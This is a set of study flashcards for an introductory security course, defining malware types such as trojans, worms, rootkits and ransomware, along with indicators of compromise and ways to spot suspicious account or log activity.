Topic 13A

Question 1

Malware

Answer 1

Software that serves a malicious purpose, typically installed without the user’s consent (or knowledge).

Question 2

Trojan

Answer 2

refers to malware concealed within an installer package for software that appears to be legitimate. This type of malware does not seek any type of consent for installation and is actively designed to operate secretly.

Question 3

Potentially unwanted programs (PUPs)/Potentially unwanted applications (PUAs)

Answer 3

software installed alongside a package selected by the user or perhaps bundled with a new computer system. Unlike a Trojan, the presence of a PUP is not automatically regarded as malicious. It may have been installed without active consent or with consent from a purposefully confusing license agreement.

Also known as grayware and bloat ware

Question 4

The payload

Answer 4

an action performed by the malware other than simply replicating or persisting on a host. Examples of payload classifications include spyware, rootkit, remote access Trojan (RAT), and ransomware.

Question 5

Virus

Answer 5

Aims to replicate and spread from computer to computer infecting files and programs

is executed only when the user performs an action such as downloading and running an infected executable process, attaching an infected USB stick, or opening an infected document with macros or scripting enabled.

Question 6

Non-resident/file infector virus

Answer 6

is contained within a host executable file and runs with the host process. The virus will try to infect other process images on persistent storage and perform other payload actions. It then passes control back to the host program.

Question 7

Memory resident virus

Answer 7

when the host file is executed, the virus creates a new process for itself in memory. The malicious process remains in memory, even if the host process is terminated.

Question 8

Boot

Answer 8

the virus code is written to the disk boot sector or the partition table of a fixed disk or USB media and executes as a memory-resident process when the OS starts or the media is attached to the computer.

Question 9

Script and macro viruses

Answer 9

the malware uses the programming features available in local scripting engines for the OS and/or browser, such as PowerShell, Windows Management Instrumentation (WMI), JavaScript, Microsoft Office documents with Visual Basic for Applications (VBA) code enabled, or PDF documents with JavaScript enabled.

Question 10

multipartite

Answer 10

is used for viruses that use multiple vectors

Question 11

polymorphic

Answer 11

used for viruses that can dynamically change or obfuscate their code to evade detection.

Question 12

computer worm

Answer 12

is memory-resident malware that can run without user intervention and replicate over network resources

can execute by exploiting a vulnerability in a process when the user browses a website, runs a vulnerable server application, or is connected to an infected file share

rapidly consume network bandwidth as the worm replicates

may also be able to crash an operating system or server application, performing a denial of service attack

can carry a payload that can be written to perform any type of malicious action.

Question 13

Fileless malware

Answer 13

does not write its code to disk. The malware uses memory-resident techniques to run in its own process, within a host process or dynamic link library (DLL), or within a scripting host. There is still disc activity. It just changes registry values to achieve persistence

Uses lightweight shellcode to create a backdoor. This is easy to obfuscate to avoid detection. Can download additional packages while obfuscating them.

may use “live off the land” techniques rather than compiled executables to evade detection. This means that the malware code uses legitimate system scripting tools, notably PowerShell and Windows Management Instrumentation (WMI), to execute payload actions. Once this happens they have all the tools they need.

Question 14

Bloatware and malware can be used for different levels of monitoring:

Answer 14

Tracking cookies - is a plaintext file, not malware, but if permitted by browser settings, third-party cookies can be used to record web activity, track the user’s IP address, and harvest various other metadata

Supercookies and beacons - A supercookie is a way of storing tracking data in a non-regular way, like saving it to the cache without flagging as a cookie. A beacon is a single pixel image embedded in a website that, while invisible, will request to download. This allows the beacon to collect data.

Adware - bloatware that performs browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening sponsor’s pages at startup, adding bookmarks, and so on

Spyware - malware that can perform adware-like tracking, but also monitor local application activity, take screenshots, and activate recording devices, such as a microphone or webcam. Can perform DNS redirection

Keylogger - spyware that actively attempts to steal confidential information by recording keystrokes. The attacker will usually hope to discover passwords or credit card data.

Question 15

remote access Trojan (RAT)

Answer 15

is backdoor malware that mimics the functionality of legitimate remote control programs, but is designed specifically to operate covertly

Question 16

A bot

Answer 16

is an automated script or tool that performs some malicious activity

Question 17

Botnet

Answer 17

group of bots that are all under the control of the same malware instance can be manipulated

triggering distributed denial of service (DDoS) attacks, launching spam campaigns, or performing cryptomining are common uses.

Question 18

command and control (C2 or C&C) host or network

Answer 18

Infrastructure of hosts and services with which attackers direct, distribute, and control malware over botnets.

is usually the best way to identify the presence of a RAT, backdoor, or bot

Question 19

IRC

Answer 19

Internet Relay Chat

A group communications protocol that enables users to chat, send private messages, and share files.

Modern methods are more likely to use command sequences embedded in HTTPS or DNS traffic

Question 20

Can trojan malware access privileges beyond the user account it infects?

Answer 20

No

Question 21

What level do critical processes run at?

Answer 21

SYSTEM

Question 22

Can trojans installed or executed with local admin privileges conceal their presence entirely?

Answer 22

It will show up as a running process or service. Often the process image name is configured to resemble a genuine executable or library to avoid detection

Question 23

How can a payload execute without requiring authorization using SYSTEM privileges?

Answer 23

the malware can be delivered as the payload for an exploit of a severe vulnerability

Alternatively, the malware may be able to use an exploit to escalate privileges to SYSTEM level after installation.

Question 24

Rootkit

Answer 24

Malware running at the SYSTEM level.

Question 25

What can a rootkit do?

Answer 25

In theory, anything. Code signing can be used to prevent kernel misuse.

It can compromise system files and programming interfaces, so that local shell processes, such as Explorer, taskmgr, or tasklist on Windows or ps or top on Linux, plus port scanning tools, such as netstat, no longer reveal its presence (at least, if run from the infected machine).

A rootkit may also contain tools for cleaning system logs, further concealing its presence.

Question 26

Examples of ransomware:

Answer 26

Will display threatening messages, such as requiring Windows to be reactivated or suggesting that the computer has been locked by the police because it was used to view child pornography or for terrorism

Question 27

Crypto-Ransomware

Answer 27

Encrypts files and holds them hostage until someone pays to decrypt them

Question 28

Logic bomb

Answer 28

A malicious program or script that is set to run under particular circumstances or in response to a defined event.

A typical example is a disgruntled systems administrator who leaves a scripted trap that runs in the event their account is deleted or disabled.

Antivirus is unlikely to detect this. Also known as a mine.

Question 29

Time bomb

Answer 29

Having infected a system, they wait for a preconfigured time or date

Question 30

tactic, technique, or procedure (TTP):

Answer 30

Tactic - high level description of a threat behavior. Behaviors such as reconnaissance, persistence, and privilege escalation are examples of tactics.

Technique - intermediate-level description of how a threat actor progresses a tactic. For example, reconnaissance might be accomplished via techniques such as active network scanning, vulnerability scanning, and email harvesting.

Procedure - detailed description of how a technique is performed. For example, a particular threat actor might use a particular tool in a distinctive way to perform vulnerability scanning.

Question 31

indicator of compromise (IoC)

Answer 31

a residual sign that an asset or network has been successfully attacked or is continuing to be attacked. Put another way, an IoC is evidence of a TTP.

Files made inaccessible, disabled system recover

Question 32

sheep dip

Answer 32

an isolated host used to test new software and removable media for malware indicators before it is authorized on the production network.

Question 33

What can Abnormal resource consumption be a sign of?

Answer 33

Malware activity

Question 34

Blocked content

Answer 34

A potential indicator of malicious activity where audit logs show unauthorized attempts to read or copy a file or other data.

Question 35

Resource inaccessibility

Answer 35

A file or service is made inaccessibile.

This is a typical indicator of a denial of service attack.

Question 36

The following indicators can reveal suspicious account behavior:

Answer 36

Account lockout

Concurrent session usage - his indicates that the threat actor has obtained the account credentials and is signed in on another workstation

impossible travel - this indicates that the threat actor is attempting to use remote access to sign in to an account from a geographic location that they would not have physically been able to move to in the time since their last sign in.

Question 37

A threat actor will often try to cover their tracks by removing indicators from log files:

Answer 37

Missing logs - this could mean that the log file has been deleted. As this is easy to detect, a more sophisticated threat actor will remove log entries. This might be indicated by unusual gaps between log entry times. The most sophisticated type of attack will spoof log entries to conceal the malicious activity.

Out-of-cycle logging - a threat actor might also manipulate the system time or change log entry timestamps as a means of hiding activity.